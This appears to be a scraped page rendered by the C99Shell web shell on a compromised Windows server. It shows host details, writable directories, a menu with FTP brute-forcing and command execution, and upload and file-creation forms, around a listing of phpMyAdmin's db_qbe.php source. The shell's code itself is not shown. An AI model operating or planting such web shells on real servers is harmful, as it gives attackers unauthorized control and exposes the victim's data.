!C99Shell v. 1.0 pre-release build #13!

Software: Apache. PHP/5.5.15 

uname -a: Windows NT SVR-DMZ 6.1 build 7600 (Windows Server 2008 R2 Enterprise Edition) i586 

SYSTEM 

Safe-mode: OFF (not secure)

E:\nuevo\phpMyAdmin2\   drwxrwxrwx
Free 10.11 GB of 239.26 GB (4.22%)
Detected drives: [ a ] [ c ] [ d ] [ e ] [ f ]
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     db_qbe.php (3.91 KB)      -rw-rw-rw-
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
getHeader(); $scripts = $header->getScripts(); $scripts->addFile('db_qbe.js'); //Get saved search list. $savedSearch = new PMA_SavedSearches($GLOBALS); $savedSearch->setUsername($GLOBALS['cfg']['Server']['user']) ->setDbname($_REQUEST['db']); if (!empty($_REQUEST['searchId'])) { $savedSearch->setId($_REQUEST['searchId']); } //Action field is sent. if (isset($_REQUEST['action'])) { $savedSearch->setSearchName($_REQUEST['searchName']); if ('create' === $_REQUEST['action']) { $saveResult = $savedSearch->setId(null) ->setCriterias($_REQUEST) ->save(); } elseif ('update' === $_REQUEST['action']) { $saveResult = $savedSearch->setCriterias($_REQUEST) ->save(); } elseif ('delete' === $_REQUEST['action']) { $deleteResult = $savedSearch->delete(); //After deletion, reset search. $savedSearch = new PMA_SavedSearches($GLOBALS); $savedSearch->setUsername($GLOBALS['cfg']['Server']['user']) ->setDbname($_REQUEST['db']); $_REQUEST = array(); } elseif ('load' === $_REQUEST['action']) { if (empty($_REQUEST['searchId'])) { //when not loading a search, reset the object. $savedSearch = new PMA_SavedSearches($GLOBALS); $savedSearch->setUsername($GLOBALS['cfg']['Server']['user']) ->setDbname($_REQUEST['db']); $_REQUEST = array(); } else { $loadResult = $savedSearch->load(); } } //Else, it's an "update query" } $savedSearchList = $savedSearch->getList(); $currentSearchId = $savedSearch->getId(); } /** * A query has been submitted -> (maybe) execute it */ $message_to_display = false; if (isset($_REQUEST['submit_sql']) && ! empty($sql_query)) { if (! preg_match('@^SELECT@i', $sql_query)) { $message_to_display = true; } else { $goto = 'db_sql.php'; // Parse and analyze the query include_once 'libraries/parse_analyze.inc.php'; PMA_executeQueryAndSendQueryResponse( $analyzed_sql_results, false, $_REQUEST['db'], null, null, null, null, false, null, null, null, null, $goto, $pmaThemeImage, null, null, null, $sql_query, null, null ); } } $sub_part = '_qbe'; require 'libraries/db_common.inc.php'; $url_query .= '&goto=db_qbe.php'; $url_params['goto'] = 'db_qbe.php'; require 'libraries/db_info.inc.php'; if ($message_to_display) { PMA_Message::error(__('You have to choose at least one column to display!')) ->display(); } unset($message_to_display); // create new qbe search instance $db_qbe = new PMA_DBQbe($GLOBALS['db'], $savedSearchList, $savedSearch); /** * Displays the Query by example form */ if ($cfgRelation['designerwork']) { $url = 'pmd_general.php' . PMA_URL_getCommon( array_merge( $url_params, array('query' => 1) ) ); $response->addHTML( PMA_Message::notice( sprintf( __('Switch to %svisual builder%s'), '', '' ) ) ); } $response->addHTML($db_qbe->getSelectionForm($cfgRelation)); ?>

:: Command execute ::

Enter:
 
Select:
 

:: Search ::
  - regexp 
:: Upload ::
 
[ ok ]

:: Make Dir ::
 
[ ok ]
:: Make File ::
 
[ ok ]

:: Go Dir ::
 
:: Go File ::
 

--[ c99shell v. 1.0 pre-release build #13 powered by Captain Crunch Security Team | http://ccteam.ru | Generation time: 0.0156 ]--